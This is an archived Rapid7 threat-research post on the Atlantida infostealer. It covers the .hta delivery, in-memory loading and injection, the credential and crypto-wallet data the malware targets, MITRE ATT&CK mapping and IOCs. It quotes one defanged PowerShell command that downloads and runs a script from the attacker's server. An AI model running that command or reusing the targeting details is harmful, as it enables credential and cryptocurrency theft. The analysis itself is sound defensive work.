{
	"id": "cfd43593-98f3-4779-93f7-5579ccdb16dd",
	"created_at": "2026-04-06T00:20:02.587283Z",
	"updated_at": "2026-04-10T13:12:57.698964Z",
	"deleted_at": null,
	"sha1_hash": "b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea",
	"title": "Whispers of Atlantida: Safeguarding Your Digital Treasure | Rapid7 Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2920967,
	"plain_text": "Whispers of Atlantida: Safeguarding Your Digital Treasure | Rapid7 Blog\r\nBy Rapid7\r\nPublished: 2024-01-17 · Archived: 2026-04-05 17:27:02 UTC\r\nRecently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a\r\ncompromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is\r\nloaded.\r\nAtlantida steals a wide range of login information of softwares like Telegram, Steam, several offline cryptocurrency wallets\r\ndata, browser stored data as well as cryptocurrency wallets browser extension data. It also captures the victim's screen and\r\ncollects hardware data.\r\nTechnical Analysis\r\nStage 1 - Delivery\r\nThe attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the\r\n.hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a\r\nhardcoded base64 string and executes the decrypted content:\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 1 of 9\n\nThe decrypted command : “C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" irm\r\nhxxp://166.1.160[.]10/loader.txt | iex“ .\r\nStage 2 - Three levels of in-memory loading\r\nThe executed PowerShell command downloads and executes a next stage PowerShell script in memory.\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 2 of 9\n\nThe PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader\r\nthat calls DownloadData API function to get a Donut injector. Donut is a position-independent code that enables in-memory\r\nexecution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created\r\n“C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe” by using a Remote Thread Injection Technique (aka\r\nCreateRemoteThread). This technique works by writing a shellcode into the context of another eligible process and creating\r\na thread for that process to run the payload.\r\nStage 3 - Atlantida Stealer\r\nThe Donut injector is used to load a final payload, which in our case is a new Atlantida Stealer. It got its name following the\r\nstring found in the executable.\r\nFirst, the Atlantida stealer captures the entire screen by using the combination of GetDC,\r\nCreateCompatibleDC,CreateDIBSection, SelectObject and BitBlt API function combination. Next, it checks if a Filezilla\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 3 of 9\n\n(open source FTP software, that allows users to transfer files from a local to a remote computer) recent services file exists. It\r\ndoes that by attempting to open “C:\\Users\\username\\AppData\\Roaming\\FileZilla\\recentservers.xml” if it does, it reads the\r\nfile. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet path:\r\nThe stealer reads all the files found under the enumerated path.\r\nNext, it collects the victim's hardware data such as RAM, GPU, CPU and screen resolution. The stealer enumerates the\r\nuser's Desktop folder and reads all text files(.txt). It also looks for Binance wallet credentials by enumerating a\r\n`C:\\Users\\Username\\AppData\\Roaming\\Binance` directory and reading all JSON files under it.\r\nSteam (video game digital distribution service) configuration and credentials are also in Atlantida stealer’s interest as we\r\nobserved it enumerating the Steam configuration directory and searches for the following files:\r\n1. Ssfn - Steam Sentry File.\r\n2. Config.vdf - Steam configuration file.\r\n3. Loginusers.vdf - stores the records of previously logged-in Steam accounts.\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 4 of 9\n\nThe last thing that Atlantida is harvesting is Telegram data. It collects all the data located in\r\n“C:\\Users\\Username\\AppData\\Roaming\\Telegram Desktop\\tdata”.\r\nThe stealer now connects to the hard coded C\u0026C server (45.144.232.99). We accessed the hardcoded IP and got to the login\r\npage of what we assume is a stealers control panel, which also had an `Atlantida` title.\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 5 of 9\n\nNo data is passed to the C\u0026C server this time and the stealer continues its collection. Differently from other stealers,\r\nAtlantida focuses only on three web browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored\r\npasswords, cookies, tokens, credit cards and autofills.\r\nOne of the notable functions of Atlantida stealer is its ability to steal data from Chrome-based browser extensions. For each\r\nChrome-based extension, an “Extension ID” is given. The malware uses this information to harvest data stored within.\r\nAtlantida harvests data from the following cryptocurrency wallets extensions:\r\nExtension Name Extension ID\r\nMetamask nkbihfbeogaeaoehlefnkodbefgpgknn\r\nSollet fhmfendgdocmcbmfikdcogofphimnkno\r\nBNB chain wallet fhbohimaelbohpjbbldcngcnapndodjp\r\nPhantom bfnaelmomeimhlpmgjnjophhpkkoljpa\r\nMetawallet bkklifkecemccedpkhcebagjpehhabfb\r\nYoroi ffnbelfdoeiohenkjibnmadjiehjhajb\r\nNami lpfcbjknijpeeillifnkikgncikgfhdo\r\nFlint hnhobjmcibchnmglfbldbfabcgaknlkj\r\nCardWallet apnehcjmnengpnmccpaibjmhhoadaico\r\nGuildwallet nanjmdknhkinifnkgdcggcfnhdaammmj\r\nTronWallet pnndplcbkakcplkjnolgbkdgjikjednm\r\nCryptoAirdrops dhgnlgphgchebgoemcjekedjjbifijid\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 6 of 9\n\nExtension Name Extension ID\r\nBitoke oijajbhmelbcoclnkdmembiacmeghbae\r\nCoin89 aeachknmefphepccionboohckonoeemg\r\nXDefiWallet hmeobnfnfcmdkdcmlblgagmfpfboieaf\r\nKeplr dmkamcknogkgcdfhhbddcghachkejeap\r\nFreaksAxie copjnifcecdedocejpaapepagaodgpbh\r\nOasis ppdadbejkmjnefldpcdjhnkpbjkikoip\r\nRabby acmacodkjbdgmoleebolmdjonilkdbch\r\nMathWallet afbcbjpbpfadlkmhmclhkeeodmamcflc\r\nNiftyWallet jbdaocneiiinmjbjlgalhcelgbejmnid\r\nGuarda hpglfhgfnhbgpjdenjgmdgoeiappafln\r\nEQUALWallet blnieiiffboillknjnepogjhkgnoapac\r\nBitAppWallet fihkakfobkmkjojpchpfgcmhfjnmnfpi\r\niWallet kncchdigobghenbbaddojjnnaogfppfj\r\nWombat amkmjjmmflddogmhpjloimipbofnfjih\r\nMEW CX nlbmnnijcnlegkjjpcfjclmcfggfefdm\r\nGuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig\r\nSaturn Wallet cphhlgmgameodnhkjdmkpanlelnlohao\r\nCloverWallet nhnkbkgjikgcigadomkphalanndcapjk\r\nLiqualityWallet kpfopkelmapcoipemfendmdcghnegimn\r\nTerraStation aiifbnbfobpmeekipheeijimdpnlpgpp\r\nAuroWallet cnmamaachppnkjgnildpdmkaakejnhae\r\nPolymesh Wallet jojhfeoedkpkglbfimdfabpdfjaoolaf\r\nICONex flpiciilemghbmfalicajoolhkkenfel\r\nNaboxWallet nknhiehlklippafakaeklbeglecifhad\r\nKHC hcflpincpppdclinealmandijcmnkbgn\r\nTemple ookjlbkiijinhpmnjffcofjonbfbgaoc\r\nTezBox mnfifefkajgofkcjkemidiaecocnkjeh\r\nCyanoWallet dkdedlpgdmmkkfjabffeganieamfklkm\r\nByone nlgbhdfgdhgbiamfdfmbikcdghidoadd\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 7 of 9\n\nExtension Name Extension ID\r\nOneKey infeboajgfhgbjpjbeppbkgnabfdkdaf\r\nLeaf Wallet cihmoadaighcejopammfbmddcmdekcje\r\nBitClip ijmpgkjfkbfhoebgogflfebnmejmfbml\r\nNashExtension onofpnbbkehpmmoabgpcpmigafmmnjhl\r\nHyconLiteClient bcopgchhojmggmffilplmbdicgaihlkp\r\nWhen the stealer finishes the collection, all data is compressed and sent to the C\u0026C server. Then the malware exists.\r\nRapid7 Customers\r\nFor Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed\r\nand alerting on the activity described in this blog:\r\nSuspicious Process - MSHTA Spawns PowerShell\r\nMITRE ATT\u0026CK Techniques:\r\nTactic Technique **Details\r\nExecution User Execution: Malicious File (T1204.002) A user downloads and executes malicious .hta file\r\nExecution\r\nCommand and Scripting Interpreter: Visual\r\nBasic (T1059.005)\r\n.hta contains malicious VBScript function\r\nExecution\r\nCommand and Scripting\r\nInterpreter:Powershell (T1059.001)\r\nVBScript executes powershell to download\r\npowershell script\r\nCommand and\r\nControl\r\nIngress Tool Transfer (T1105)\r\nA powershell script downloads an additional .Net\r\nLoader\r\nDefense\r\nEvasion\r\nReflective Code Loading (T1620) Powershell script executed the loader reflectively\r\nDefense\r\nEvasion\r\nProcess Injection (T1055) The .Net loader injects into RegAsm.exe process\r\nCredential\r\nAccess\r\nCredentials from Password Stores: Credentials\r\nfrom Web Browsers (T1555.003)\r\nAtlantida steals stored browser data such as\r\npasswords, cookies, tokens, credit cards and\r\nautofills\r\nCredential\r\nAccess\r\nCredentials from Password Stores (T1555)\r\nAtlantida steals offline cryptocurrency wallets\r\ndata, and other software data\r\nDiscovery System Information Discovery (T1082) Atlantida collects victim’s hardware information\r\nCollection Screen Capture (T1113) Atlantida captures victim’s screen\r\nExfiltration Exfiltration Over C2 Channel (T1041) Atlantida exfiltrats all collected data\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 8 of 9\n\nIOCs\r\nIOC SHA-256 Notes\r\nReadEra_v1.4.2.hta 67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8\r\nMalicious\r\n.hta file\r\nhttp://166.1.160[.]10/loader.txt\r\nMalicious\r\npowershell\r\nscript\r\nhttp://166.1.160[.]10/www_c.bin f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3\r\nStores\r\n.Net\r\nLoader\r\nhttp://166.1.160[.]10/www.bin 350216884486d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0\r\nStores\r\nDonut\r\nshellcode\r\nAtlantidaStealer.exe b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130\r\nAtlantida\r\nstealer\r\n45.144.232[.]99\r\nC\u0026C\r\nserver\r\nSource: https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/"
	],
	"report_names": [
		"whispers-of-atlantida-safeguarding-your-digital-treasure"
	],
	"threat_actors": [],
	"ts_created_at": 1775434802,
	"ts_updated_at": 1775826777,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea.pdf",
		"text": "https://archive.orkl.eu/b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea.txt",
		"img": "https://archive.orkl.eu/b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea.jpg"
	}
}